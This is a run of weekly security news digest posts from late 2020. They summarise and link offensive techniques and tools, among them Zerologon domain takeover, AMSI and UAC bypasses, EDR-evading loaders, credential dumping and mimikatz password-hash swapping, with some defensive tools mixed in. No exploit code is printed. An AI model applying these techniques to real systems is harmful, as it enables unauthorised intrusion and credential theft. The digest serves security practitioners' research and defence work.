  • Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472). A holdover feature from Windows NT that allows computer accounts to authenticate to a Domain Controller via NetLogon and uses AES-CFB8 with a zero'd IV means that 1/256 attempts with a zero'd client challenge (attacker controlled) will result in a session key of all zeros. Since computer accounts don't get locked out, an attacker can authenticate to your Domain Controller as the Domain Controller computer account in under 256 tries. From there, a password reset can be issued and all hashes dumped. With these hashes, a pass-the-hash (or golden ticket) can be used to log back into the DC and reset its computer password back to whatever it was before the attack. This is the worst bug since MS17-010 aka ETERNALBLUE and I predict it will be used in all types of attacks but ransomware just got an "easy button" for complete domain compromise. This is a drop-everything-and-patch scenario. Multiple PoCs exist (this one is the best). A Sigma rule is also available (requires registration with SOCPrime but the rule is free).
  • WSUS Attacks Part 2: CVE-2020-1013 a Windows 10 Local Privilege Escalation 1-Day. The ability to intercept WSUS locally, and add a certificate to the current user's local store means that arbitrary Microsoft signed (psexec) binaries can be run as SYSTEM by any user. Tool release coming in less than 30 days.
  • Evilginx 2.4 - Gone Phishing. Evilginx is an amazing tool for phishing assessments, and it just got better. Kuba added a bunch of neat new features like pre-load pages and IP blacklisting. Be sure to update and try them out!
  • snuffy is a simple command line tool to dump the data sent and received by programs that use OpenSSL. Here is an example of dumping data from Zoom.
  • SRC-2020-0019 : Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability. This is an authenticated RCE against Exchange servers that allows any authenticated user to execute code as SYSTEM! Both HTTPS and Ps-Remoting PoCs are available - patch now!
  • Windows: CloudExperienceHostBroker Unsafe COM Object EoP. COM objects with bad access control lists (ACLs) lead to the ability to add a user as an Administrator from any account. C# PoC here.
  • twistrs is a domain name permutation and enumeration library powered by Rust. It most cases it has better coverage and is much faster than dnstwist. Blog post here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • DumpsterDiver is a tool, which can analyze big volumes of data in search of hardcoded secrets like keys (e.g. AWS Access Key, Azure Share Key or SSH keys) or passwords. Additionally, it allows creating a simple search rules with basic conditions (e.g. report only csv files including at least 10 email addresses).

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-09-21

By: Erik
22 September 2020 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-09-14 to 2020-09-21.

News

Techniques

  • Aruba Clearpass RCE (CVE-2020-7115). Argument injection is an under appreciated bug class, but it is more powerful and more widespread than most researchers realize. In this case Daniel uses some nifty tricks to get a root reverse shell.
  • Building a custom Mimikatz binary shows how red teamers can take open source tools, and modify the source code to bypass most static detections. You'll have to do some more work for advanced EDR detections based on dynamic or behavioral analysis.
  • Are You Docking Kidding Me?. In this post, Leo Pitt shows the macOS equivalent of using LNK files on Windows to persist in the Dock on macOS. The post ends with a very thorough detection section.
  • Beacon Object File ADVENTURES: Some Zerologon, SMBGhost, and Situational Awareness. Beacon object files (BOFs) are a new capability in Cobalt Strike that allow for compiled code to run in the context of a beacon. This post introduces two exploits and a bunch of situational awareness BOFs to get you started.
  • Implementing Direct Syscalls Using Hell’s Gate. Instead of baking your syscall numbers into your binary (and having to keep a list of them for every OS), use the Hell's Gate technique (LWiS 2020-06-08) to determine them dynamically. PoC here.
  • MacOS Injection via Third-Party Frameworks. This is some great macOS research by Adam Chester that shows how apps that use debugging pipes (like Fiddler or VSCode) for injection as well as Electron apps for Transparency, Consent, and Control (TCC) bypass/obfuscation.
  • MemFuck: Bypassing User-Mode Hooks. Sometimes you want to remove ALL the usermode hooks from your process by unmapping everything you can. In that case this project is for you - it uses some really interesting tricks to unmap DLLs and then use direct syscalls. PoC here.
  • I Like to Move It: Windows Lateral Movement Part 2 – DCOM. Dominic Chell shows how DCOM can be used for lateral movement in a Windows network, including using Excel 4 macros for lateral movement.

Tools and Exploits

  • DLLsForHackers generates Dlls that can be used for side loading and other attack vectors. This Dll will (maybe) not cause deadlock since it only use functions that are DllMain safe (unlike many other tools/DLL hijacking techniques). For a potentially more mature tool, see Koppeling.
  • tmpmail is a command line utility that allows you to create a temporary email address and receive emails to the temporary email address. It uses 1secmail's API to receive emails. Prefer python? pydispo has you covered.
  • AMSI.fail is a C# Azure Function with an HTTP trigger that generates obfuscated PowerShell snippets that break or disable AMSI for the current process. Check out the live site: www.amsi.fail.
  • sshiva is a C# application that allows you to run SSH commands against a host or list of hosts.
  • DiscerningFinch collects an array of OS specific string constants and then attempts to use those to brute-force decrypt the inner binary. If it succeeds it loads the inner binary into memory passing along any command line arguments that may exists. If it fails, it prints out a .NET-looking error message as feedback.
  • Firefox for Android LAN-Based Intent Triggering. The SSDP engine in Firefox for Android (68.11.0 and below) can be tricked into triggering Android intent URIs with zero user interaction. This attack can be leveraged by attackers on the same WiFi network and manifests as applications on the target device suddenly launching, without the users' permission, and conducting activities allowed by the intent. Demo here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • HTTP Toolkit is a cross platform, open source, HTTP MitM proxy. This looks super powerful, and easy to use. For HTTP request monitoring and modification, this looks easier to use than Burp Suite.
  • MoveScheduler focuses on lateral movement via several different methods of scheduling tasks: Win32_ScheduledJob (C#), Win32_Scheduledjob (PowerShell), TaskScheduler Library, and PS_ScheduleTask.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-09-28

By: Erik
29 September 2020 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-09-21 to 2020-09-28.

News

Techniques

  • The Return of Raining SYSTEM Shells with Citrix Workspace app. The MSI transform feature is not widely known, but probably can be used malicious as shown here in many more cases. This is another great example of not giving up on a bug just because it was "patched." CCob also released PwnyForm, a tool that can take an MSI input and generate an MSI transform that can be used for arbitrary command execution via custom actions.
  • Unquoted paths. They’re not just for services anymore. Unqouted service paths are an all too common issues on Windows machines, especially with third party software. This post discusses how the same issue can affect Scheduled Tasks, and how a standard Microsoft task was vulnerable. Add this to your list of things to check for potential privilege escalation on a Windows machine.
  • Local Privilege Escalation in FortinetSSL VPN client for Linux. Local Privilege Escalation (LPE) comes for Linux via the FortinetSSL VPN client which is SUID and blindly trusts argv[0] to be the path to its install location. This advisory contains a PoC which affects (at least) FortinetSSL Linux VPN client versions 4.0-2281 and 4.4-2336.
  • ZeroLogon(CVE-2020-1472) - Attacking & Defending. As the dust settles from the ZeroLogon announcement, this post goes into the technical details of both the exploit (but no work on repairing the DC after exploit) and various detection strategies.
  • A different way of abusing Zerologon (CVE-2020-1472). Dirk-jan is one of the researchers on the forefront of Windows/AD knowledge (along with Will Schroeder [@harmj0y] and Benjamin Delpy [@gentilkiwi]) and this post proves it. Dirk-jan manages to modify impacket to use Zerologon to relay a machine authentication solicited with SpoolSample from one DC to another, preventing the machine account password reset in the normal Zerologon attack flow that causes major issues.
  • Samba Unauthenticated domain takeover via netlogon ("ZeroLogon"). If you are running Samba <= 4.7 as a domain controller, you are vulnerable to ZeroLogon. This bug isn't just for Windows!
  • Abusing Group Policy Caching. A standard domain user can perform, via the “gpsvc” service, arbitrary file overwrite with SYSTEM privileges by altering behavior of “Group Policy Caching”. This can be used to elevate from a standard user to SYSTEM, however it has since been patched (CVE-2020-1317) by making the group policy folders readonly for standard users.
  • Phishing Your Password Manager. Feeling smug about credential harvesting because your password manager recognizes when sites don't match? Curtis Brazzell shows that some auth providers allow custom login pages which can be implanted with form capture so the domain does match, and your password manager likely will fill in creds. Manually verify those domains, every time!
  • Hacking Punkbuster. Punkbuster is an anti-cheat system for PC video games that has some very malware like properties (ability to take screenshots). This post shows how the Punkbuster server is vulnerable to a path traversal in the screenshot name. Unfortunately, "for security reasons we will only give a high level description of the vulnerability and won’t dive deep into the actual reverse engineering process." I'm guessing they used Firda?
  • Bypassing Android MDM using Electromagnetic Fault Injection by a Gas Lighter for $1.5. We've talked about hardware glitching before (LWiS 2020-08-31), but this is a low cost, low complexity attack to glitch an Android phone into sysdump which allows for the System on a Chip (SoC) recovery port to be used to flash new firmware, bypassing the very locked down system. Physical access is always root access, sometimes it just takes a bit more work.
  • Azure Account Hijacking using mimikatz’s lsadump::setntlm. Have Domain Admin but need to access data as a user with a password hash that won't crack? Wait for them to go home, then use lsadump::changentlm and lsadump::setntlm to change their password to something you do know, and put it back to their NTLM hash before they return in the morning.
  • Exploiting Tiny Tiny RSS. This is a deep dive into webapp source code review and hacking. The authors pull together a very impressive single click exploit that backdoor's a user's TT-RSS server. There are some great advanced techniques in this post - and the classic gopher:// trick as well.
  • Kernel exploitation: weaponizing CVE-2020-17382 MSI Ambient Link driver. If you have any interest in kernel or driver exploitation, this blog is a must read.
  • Smaller C Payloads on Window shows how to get an 8-12x reduction in binary size by removing the Visual C++ runtime from Windows binaries, and only including the functionality your program actually needs. Note that this limits some of the comfort features of C/C++.

Tools and Exploits

  • mitra is a python tool to generate binary polygots (one file that can be parsed as two different formats like a PNG and a DICOM). This could be useful to bypass file upload restrictions or generally mess with file parsers.
  • Gopher is a C# tool to search for credentials from all types of applications on Windows.
  • SharpDirLister is a .NET 4.0 tool for super fast directory listings.
  • RegSave is a .NET 3.5 tool for dumping the SAM, SYSTEM, and SECURITY registry keys.
  • CVE-2020-3433 is a collection of 3 vulnerabilities in the Cisco AnyConnect client for Windows, one of which is a local privilege escalation (sound familiar? CVE-2020-3153 was exploited by the same researcher - @AntoineGoichot after being found by @yorickkoster).
  • Offensive Terraform Modules provide automated multi-step offensive attack modules using Infrastructure as Code (IAC).
  • duf is a clean disk usage utility for Linux, FreeBSD, and macOS. It even outputs in JSON!
  • mikrot8over a rework of the Mikrotik RouterOS (<= 6.38.4) exploit with multithreaded scan capability.
  • UrbanBishopLocal is a port of FuzzySecurity's UrbanBishop project for inline shellcode execution.
  • Introducing “YAYA”, a New Threat Hunting Tool From EFF Threat Lab. YAYA is a new open source tool to help researchers manage multiple YARA rule repositories. YAYA starts by importing a set of high-quality YARA rules and then lets researchers add their own rules, disable specific rulesets, and run scans of files.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • IBM QRadar Wincollect Escalation of Privilege (CVE-2020-4485 & CVE-2020-4486). I missed this one last week, but arbitrary file delete leads to elevation of privilege using the IBM QRadar Wincollect installer.
  • crowdsec is a lightweight Go agent to detect and respond to bad behaviors. It also automatically benefits from our global community-wide IP reputation database (can be disabled with apimode: false). If fail2ban is too simple, this may be what you are looking for.
  • Macrome is an Excel macro document reader and writer for red teamers and analysts. It uses Excel 4.0 macros and the BIFF8 (Excel 97-2003 Binary) XLS format which will likely bypass many detections. Details here.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-10-05

By: Erik
6 October 2020 at 03:20

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-09-28 to 2020-10-05.

News

  • UHS hospitals hit by reported country-wide Ryuk ransomware attack. Two weeks ago was the first possible death related to ransomware. There are at least three being reported due to this. Of note, while many ransomware crews stated they would not target hospitals when the pandemic started, Ryuk remained silent.
  • Advisory on Potential Sanctions Risks for Facilitating Ransomware Payments. Cybersecurity firms now need to register as money services to legally make ransomware payments, and "payments demanded as a result of malicious cyber-enabled activities will be reviewed by OFAC on a case-by-case basis with a presumption of denial."
  • OST Map from Intezer connects threat actors with the tools they use. This is an interesting resource for adversary emulation purposes. If you enjoy this you may also like the CyberWar Map.
  • Sectigo to Be Acquired by GI Partners. The Root CA shell game continues (Sectigo used to be Comodo). This will trigger another round of compliance checks.
  • Escaping strings in Bash using !:q. A quick tip for bash users.
  • Code scanning is now available!. GitHub code scanning attempts to find vulnerabilities in your code via static analysis before it gets deployed. They are using the acquisition of Semmle to push CodeQL even further. This proactive approach is a good thing for security.

Techniques

Tools and Exploits

  • SIEGMA aims to automate the creation of SIEM rule consumables by leveraging a pre-defined set of configurations/mappings and by utilizing the sigma rule format and engine.
  • DecryptRDCManager is a .NET port of Decrypt-RDCMan.ps1 which was written by Ben Turner and Rich Hicks. This tool will decrypt credentials from Remote Desktop Manager by using the functionality from the RDCMan.DLL.
  • Fork-n-Run. This is great raw C# material for building into your own tools (PPID spoofing, BlockDLLs, argument spoofing, comms via pipes).
  • MFASweep is a PowerShell script that attempts to log in to various Microsoft services using a provided set of credentials and will attempt to identify if MFA is enabled. Depending on how conditional access policies and other multi-factor authentication settings are configured some protocols may end up being left single factor. It also has an additional check for ADFS configurations and can attempt to log in to the on-prem ADFS server if detected. Be warned, this will attempt 7 authentications, so be sure to use a correct password or possibly get locked out! Blog post here.
  • AggressiveGadgetToJScript is a Cobalt Strike Aggressor script to generate GadgetToJScript payloads. It uses the QueueUserAPC injection method and injects into notepad.exe (you should change this).
  • bitleaker is a complete physical attack tool (bootable USB) that leverages CVE-2018-6622 (BIOS sleep TPM bug) and the new CVE-2020-0526 to enable the mounting of Bitlocker encrypted drives without the user's password which is normally required. If devices are out of your physical control (work from home, travel) this bug/exploit applies to you. Update your systems to the latest BIOS firmware, disable sleep in the BIOS, or use BitLocker with a PIN to mitigate this.
  • GLORP is a command line HTTP intercept proxy. The idea is to provide a CLI based tool for when you wanna-look-at-this-thing-real-quick and not fire up yet another full-fat container/vm/whatever with Burp and so forth. Looking for more GUI? Read on...
  • hetty is an HTTP toolkit for security research. It aims to become an open source alternative to commercial software like Burp Suite Pro, with powerful features tailored to the needs of the infosec and bug bounty community. Currently in the early stages, this is an interesting project to watch.
  • Raccine is a simple ransomware vaccine that kills the process tree that invokes vssadmin or wmic calls to delete volume shadow copies by registering as a debugger for vssadmin and wmic. This is a neat trick that will likely work against many ransomware variants.
  • elsa is a minimal, fast and secure runtime for Javascript and Typescript written in Go. This could be used to create an embedded scripting environment in your Go malware a la gscript.
  • sploit is a Go package that aids in binary analysis and exploitation. Think of it as the start of a Go version of pwntools.
  • feroxbuster is a fast, simple, recursive content discovery tool written in Rust.
  • CSharp-CmdLineHelper-Parser is a "no frills" 1 class-only, C# .NET command line parser with support for - and / args, switches only, and Name : Values. This will be useful for small C# projects.
  • checksec.py is a complete checksec tool in python with rich terminal output. It supports PE and ELF files and there is an exe in the Github release.
  • Docker-eyeOS runs iOS (xnu-arm64) in a Docker container! Supports KVM + iOS kernel debugging (GDB)! It's like having your own local Corellium.
  • A New Tool for Password Spraying Emulation. Spray at scale using GCP/AWS with this new tool from Praetorian. Code here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • Vulmap is an online local vulnerability scanner. It's aimed at organizations to do vulnerability scanning across their fleets, but it can also be used for one off checks to see what is available to privesc.
  • grinder is a python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys). Add this to your enumeration pipeline.
  • GHunt is a tool to investigate Google Accounts given only an email.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-10-12

By: Erik
13 October 2020 at 03:20

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-10-05 to 2020-10-12.

News

  • Python 3.9 is out which brings new features like dictionary merging (dict1 | dict2), dictionary updates (dict1 |= dict2) , type hinting, and a new parser.
  • ESXi on Arm Fling is LIVE!. Teased at VMworld Europe 2018, the ARM variant of ESXi is finally here. It can run on a Raspberry Pi 4 (8GB highly recommended) and can act as a vSAN witness in a two node cluster (not officially supported).
  • Enter the Vault: Authentication Issues in HashiCorp Vault. Two vulnerabilities in HashiCorp Vault could allow an attacker to bypass authentication checks in Amazon Web Services (AWS) and Google Cloud Platform (GCP) configurations.
  • Report: U.S. Cyber Command Behind Trickbot Tricks. Some entity was sending Trickbot configs with a new C2 address of 127.0.0.1 as well as spamming the bot registration endpoints to flood Trickbot operators with bad data. This article claims it was USCYBERCOM.
  • We Hacked Apple for 3 Months: Here’s What We Found. @samwcyo and friends spent a few months tearing through everything Apple dropping criticals along the way. This write up is very well done, and is worth the read. They will likely cross $500,000 in bounties once all are paid.

Techniques

Tools and Exploits

  • TinyAFL is a fuzzer designed for macOS usermode applications even if source code is not available.
  • UAC-SilentClean implements a DLL planting technique to bypass UAC Always Notify and execute code in a high integrity process. The SilentCleanup technique has been known for quite some time, and Microsoft has made no attempt to fix it, so this will likely continue to work until the scheduled task is changed for some other reason unrelated to security.
  • BOF-RegSave will acquire the necessary privileges and dump SAM - SYSTEM - SECURITY registry keys for offline parsing and hash extraction.
  • jwt-secrets is a collection of many public-available JWT secrets from code samples that may be used in production. It is the list used in the new Burp app jwt-heartbreaker (more details here).
  • gitjacker downloads git repositories and extracts their contents from sites where the .git directory has been mistakenly uploaded. It will still manage to recover a significant portion of a repository even where directory listings are disabled.
  • CSRFER is a tool to generate csrf payloads based on vulnerable requests.
  • screego server allows you to share your screen with good quality and low latency. Screego is an addition to existing software and only helps to share your screen. This is useful for code reviews where the quality of Teams/Meet/Zoom doesn't cut it.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • FavFreak matches favicon hashes to their services using a large fingerprint dictionary. This can be a quick win when identifying web technologies on a large attack surface.
  • pwndoc is similar to Ghostwriter allowing multiple users to collaborate on assessment or vulnerability reports and generate a customized Docx report.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-10-19

By: Erik
20 October 2020 at 03:40

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-10-12 to 2020-10-19.

News

  • Microsoft Uses Trademark Law to Disrupt Trickbot Botnet. Just days after Trickbot was disrupted by USCYBERCOM (allegedly), Microsoft uses a unique legal trick to shut down additional C2 infrastructure by forcing hosting providers and telecom companies to block access to the C2 infrastructure.
  • German police raid tech firm FinFisher over spyware allegations. FinFisher is accused of selling surveillance software, to oppressive regimes around the world (Turkey, Ethiopia, Bahrain, the UAE, and Egypt). FinFisher was spectacularly breached back in 2014 when it was owned by UK based Gamma Group (writeup).
  • Java deserialization vulnerability in QRadar RemoteJavaScript Servlet. Nothing quite as face-palm-able as having RCE in your security product. The RCE is authenticated, but still not a good look.
  • CVE-2020-16898 Windows TCP/IP Remote Code Execution Vulnerability. Patch Tuesday reveals a critical unauthenticated potential RCE in the Windows TCP/IP stack when it handles ICMPv6 Router Advertisement packets. While this is bad, the protections in tcpip.sys will make a RCE PoC difficult. Patch or apply the workaround regardless. More details here.
  • International Statement: End-To-End Encryption and Public Safety. Five Eyes (FVEY) intel alliance countries of Australia, Canada, New Zealand, the UK, and US were joined by India and Japan in calling for tech firms to “enable law enforcement access to content” upon production of a warrant, in the name of public safety. This same strategy was attempted in the 90s. However, end-to-end encryption is easy to implement now, and mathematics/cryptography cannot be banned. If implemented, bad actors will continue to use end-to-end encryption while citizen's privacy is destroyed.
  • SonicWall VPN Portal Critical Flaw (CVE-2020-5135). Nearly 800,000 SonicWall VPNs are vulnerable to new remote code execution bug. The bug is in the SSLVPN, which is exposed to the internet as part of its functionality. Tripwire VERT says that a "code execution exploit is likely feasible."
  • Plug'nPwn - Connect to Jailbreak. The recent T2 security chip jailbreak has been productized and is now as easy as connecting a special cable/device to an Apple laptop. I expect this to be productize further into a full tool with additional features like a keylogger. Demo here.

Techniques

Tools and Exploits

  • stegbrute is a fast steganography bruteforce tool written in Rust (useful for CTFs).
  • CVE-2020-16938 Windows Kernel Information Disclosure Vulnerability. Normally I wouldn't put a link to a Microsoft Advisory, but this one is so trivial to exploit, that 7zip can read any file on a Windows disk (if Bitlocker is not in use) by directly opening the physical device.
  • Alaris is a protective and Low Level Shellcode Loader the defeats modern EDR systems with direct syscalls, DLL blocking, PPID spoofing, and shellcode encryption. Well written blog describing the tool here.
  • CobaltStrike-BOF are DCOM and WMI lateral movement BOFs for Cobalt Strike.
  • MacC2 is a python-based macOS C2 that uses internal API calls instead of command line utilities.
  • InSync is a macOS Finder persistence technique. Code is 3 months old but only made public 2020-10-19.
  • CalendarPersist is a JXA script to allow programmatic persistence via macOS Calendar.app alerts. Blog post here. It's a big week for macOS tools!

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • PrismX is a Cloud Security Dashboard, providing a single source of truth for cloud security issues based on AWS CIS Security Benchmarks. The dashboard provides a high-level overview for executives as well as actionable data for individual contributors with built-in JIRA integration.
  • RmiTaste allows security professionals to detect, enumerate, interact and exploit RMI services by calling remote methods with gadgets from ysoserial.
  • HackBrowserData is a cross platform Go tool to decrypt passwords for most browser.
  • SharpBuster is a C# implementation of a directory brute forcing tool. It's designed to be used via Cobalt Strike's execute-assembly and similar tools, when running a similar tool over a SOCKS proxy is not feasible.
  • SharpCrashEventLog crashes the Windows event log 3 times which keeps it down for 24 hours. Blog post here.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-10-26

By: Erik
26 October 2020 at 23:30

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-10-19 to 2020-10-26.

News

  • US charges Russian hackers behind NotPetya, KillDisk, OlympicDestroyer attacks. This indictment isn't groundbreaking for its attribution of the 3 attacks to Russian hackers (that was widely assumed), it is however very interesting to see the evidence for such attribution. Clearly, the US government has a lot of access to some of the backends used by the hackers. Bravo. For excerpts, see this twitter thread.
  • Multiple vulnerabilities in VMware ESXi. No PoCs yet but this is a potential unauthenticated remote code execution vulnerability in the OpenSLP service on ESXi (port 427).
  • Apple Approved Malware. Malware is being deployed using binaries that are notarized (signed) by Apple after passing their review process. This wouldn't be as bad if the signed samples weren't known malware! Additionally, after reporting one sample, the actors simply updated their campaign with a freshly signed sample of the same thing. Clearly, the actors involved have the notarization process figured out and automated. This is a bad look for Apple who tout this notarization feature as a big security selling point.
  • Recent and upcoming changes to the Nano projects. Popular ad blocker NanoCore was recently sold to a Turkish developer who immediately changed the privacy policy and modified the code. Browser extensions command great power, and should be carefully scrutinized.
  • 1Password for Linux beta is now open. One of the more popular password managers is now available on linux (in beta). For an open source alternative that is available on linux today, check out Bitwarden.
  • YouTube-DL Removed From GitHub After DMCA Notice. This is an incredibly useful tool with a wide range of legitimate uses. The complaint says the code can be used to download copyrighted works. This sets a precedent that makes posting software or tools that can be used for malicious acts (nearly everything in every LWiS) potentially subject to take down as well (for ToS violations not DCMA). Looks like people are already using a GitHub "feature" to attach a commit of youtube-dl to the DCMA repo (and of course forks like yt-dlc exist).

Techniques

Tools and Exploits

  • Wraith is a native loader designed to pave the way for the arrival of a Stage-1/Beaconing implant or Stage-2/Post-Ex implant in-memory securely and stealthily. Specially designed to operate in heavily-monitored environments, it is designed with AV Evasion as its primary goal.
  • PEzor v2 — New Output Formats and Cobalt Strike Integration. PEzor was already a great tool, and v2 includes new features like a nice cna script to make in-memory execute of nearly any binary a single command. If you haven't checked this out before v2, it is even more valuable now.
  • Hot Manchego is a new tool for creating macro-enabled Excel workbooks that use the .NET library EPPlus to bypass many AV solutions.
  • Secret fragments: Remote code execution on Symfony based websites. The _fragment endpoint used by Symofny (and therefore lots of PHP based web apps/CMSs) uses an HMAC to verify commands. Unfortunately, lots of sites are using default keys to generate the HMAC, and are therefore vulnerable to RCE. PoC here.
  • RegistryStrikesBack allows a red team operator to export valid .reg files for portions of the Windows Registry via a .NET assembly that should run as a standard user. See Segmentation Vault in Techniques for example usage.
  • CloneVault allows a red team operator to export and import entries including attributes from Windows Credential Manager. This allows for more complex stored credentials to be exfiltrated and used on an operator system. See Segmentation Vault in Techniques for example usage.
  • Announcing PyRDP 1.0. The advanced RDP python library gains features as it reaches 1.0 including CredSSP, Clipboard file carving, headless player support, dynamic certificate cloning, and a new conversion tool to output mp4 videos of RDP sessions from PyRDP captures or even PCAPs.
  • CVE-2020-15906 is an authentication bypass for TikiWiki CMS 16.x-21.1. This wiki software is often used internally by dev shops, so this vulnerability could prove very useful on internal engagements. Demo here.
  • wsb-detect enables you to detect if you are running in Windows Sandbox ("WSB"). The sandbox is used by Windows Defender for dynamic analysis, and commonly manually by security analysts and alike.
  • setsidmapping is a tool to use LsaManageSidNameMapping get LSA to add or remove SID to name mappings. It requires SeTcbPrivilege as well as some other caveats. Not sure what advantages this provides right now, but I'm sure James is cooking up something with this tool.
  • procrustes is a bash script that automates the exfiltration of data over dns in case you have blind command execution on a server where all outbound connections except DNS are blocked.
  • WSuspicious is a proof of concept program to escalate privileges on a Windows host by abusing WSUS. Details in this blog post.
  • Local Privilege Escalation Vulnerability Discovered in VMware Fusion. A nice macOS privilege escalation using VMware Fusion. The bug was patched in September but the PoC is fresh. Code here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • NTLMRawUnHide is a Python3 script designed to parse network packet capture files and extract NTLMv2 hashes in a crackable format. The following binary network packet capture formats are supported: *.pcap *.pcapng *.cap *.etl.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-11-02

By: Erik
3 November 2020 at 04:50

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-10-26 to 2020-11-02.

News

Techniques

  • Process Herpaderping is a method of obscuring the intentions of a process by modifying the content on disk after the image has been mapped. This can be used to bypass some (most?) AVs and some file integrity monitoring solutions depending on when and how the perform their checks of files on disk. It can fool Windows Defender into thinking mimikatz is "signed" as well.
  • Hacking in an epistolary way: implementing kerberoast in pure VBA. What if you did every stage of your attack via phishing payloads? VBA is technically Turing complete, so it is technically possible. This post explores how to Kerberoast in pure VBA. Half amazing, half insane.
  • Fuzzing for eBPF JIT bugs in the Linux kernel. This post shows how a a writeup lead a researcher to conduct his own research and in doing so found a new vulnerability in the patch! This local privilege escalation vulnerability affects Linux kernels with the "patched" eBPF verifier before 5.8.15 (starting at 5.6.1, 5.5.14, and 5.4.29). No public PoC yet.
  • What would you risk for free Honey?. Browser extensions don't often get the attention they deserve from security professionals. This post exposes some serious issues with the popular "Honey" extension, in this case four different ways the Honey server could run arbitrary code on any website you visit while it is installed.
  • MalDoc Fu - Some Ideas for Malicious Document Delivery. Maldocs (macro enable malicious documents) are a favorite of phishing engagements, but as people and technologies slowly get better, they are becoming less successful. This post explores some new advanced forms of Maldocs to hide your malicious payloads and bypass current AV. Well done!
  • Remote Desktop Services Shadowing – Beyond the Shadowed Session. RDP Shadowing is the process of connecting to an already open RDP session. This is useful for legitimate purposes, and could be very useful for red team purposes as well. With some registry changes, it can be made silent and red teamers can effectively spy on legitimate RDP sessions.
  • UAC bypasses from COMAutoApprovalList details the two newest additions to UACME that use the Windows COM object model classes with enabled elevation.
  • Using and detecting C2 printer pivoting explores a very interesting "esoteric C2 channel" of using print jobs to communicate on a Windows network.
  • NAT Slipstreaming allows an attacker to remotely access any TCP/UDP service bound to a victim machine, bypassing the victim's NAT/firewall (arbitrary firewall pinhole control), just by the victim visiting a website. The fastest-spreading virus author is back with more great research. This abuses SIP Application Layer Gateway (maybe enabled by default) and bad packet fragmentation handling to allow browsers to generate what (bad) routers think are arbitrary packets. This allows all kinds of things like opening ports to other internal devices by just having a user run some javascript by browsing a website. Very cool, but possibly limited to sketchy defaults and poor packet fragmentation handling.

Tools and Exploits

  • MaliciousClickOnceMSBuild is a C# Project that will take an MSBuild payload and run it with MSBuild via ClickOnce. Be aware that without a valid certificate it will trigger a smartscreen warning.
  • BOF.NET is a small native BOF object combined with the BOF.NET managed runtime that enables the development of Cobalt Strike BOFs directly in .NET. BOF.NET removes the complexity of native compilation along with the headaches of manually importing native API. Now you can write your BOFs in .NET instead of C!
  • HoneyCreds is a network credential injection tool to detect responder and other network poisoners. Set this up with a legitimate looking username and easy to crack password and trigger on any use of the account in your environment.
  • CVE-2020-14882. Oh boy, a single GET gets unauthenticated remote code execution against Oracle Web Logic. The patch is amazingly poor as well.
  • MalwareMultiScan is a self-hosted VirusTotal / MetaDefender wannabe with API, demo UI and Scanners running in Docker. Like other self-hosted AV scanners, it only runs Linux based AVs (and Windows Defender). This joins malice, saferwall, and MultiAV-Extended for self hosted AV scanning solutions.
  • UltimateWDACBypassList is a centralized resource for previously documented WDAC/Device Guard/UMCI bypass techniques.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • dendron is a local-first, markdown based, hierarchical note-taking application built on top of VSCode and friends. Similar to Obsidian or Roam, but open source and free.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-11-09

By: Erik
10 November 2020 at 20:30

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-11-02 to 2020-11-09.

News

  • Live off the Land? How About Bringing Your Own Island? An Overview of UNC1945. Linux based APTs don't get much attention, and APTs that target Solaris, even less - until now. Mandiant exposes all the tricks of an APT group that used a Solaris SSH 0day for initial access, and deployed quite a suite of tools (including an entire QEMU VM) once in the network.
  • Raspberry Pi 400 launched. This new Raspberry Pi introduces a new form factor, the computer-as-a-keyboard. A new board incorporates the Raspberry Pi 4 (4GB) into a small keyboard. One notable change is a slightly updated processor with a 1.8 GHz quad-core ARMv8 chip (vs 1.5 GHz in the standard 4), and a massive heatsink to keep it from overheating. With its ability to run dual 4k displays, this portable computer could be perfect for students or anyone who needs a basic computing environment. I am also interested to see it being used as a thin client device.
  • Chrome Root Program. Chrome will start shipping its own root Certification Authorities (CA) store instead of relying on the operating system's CA store. Mozilla already does this in Firefox, and it will present challenges to enterprises that deploy their own root CAs for HTTPS interception or other purposes.
  • Cyber ActorsTarget Misconfigured SonarQube Instances to Access Proprietary Source Code of US Government Agencies and Businesses. The FBI reveals that threat actors have stolen private and US Government source code due to misconfigurations in SonarQube instances. This is a great example of why having a government backdoor "only for the good guys" is a terrible idea.
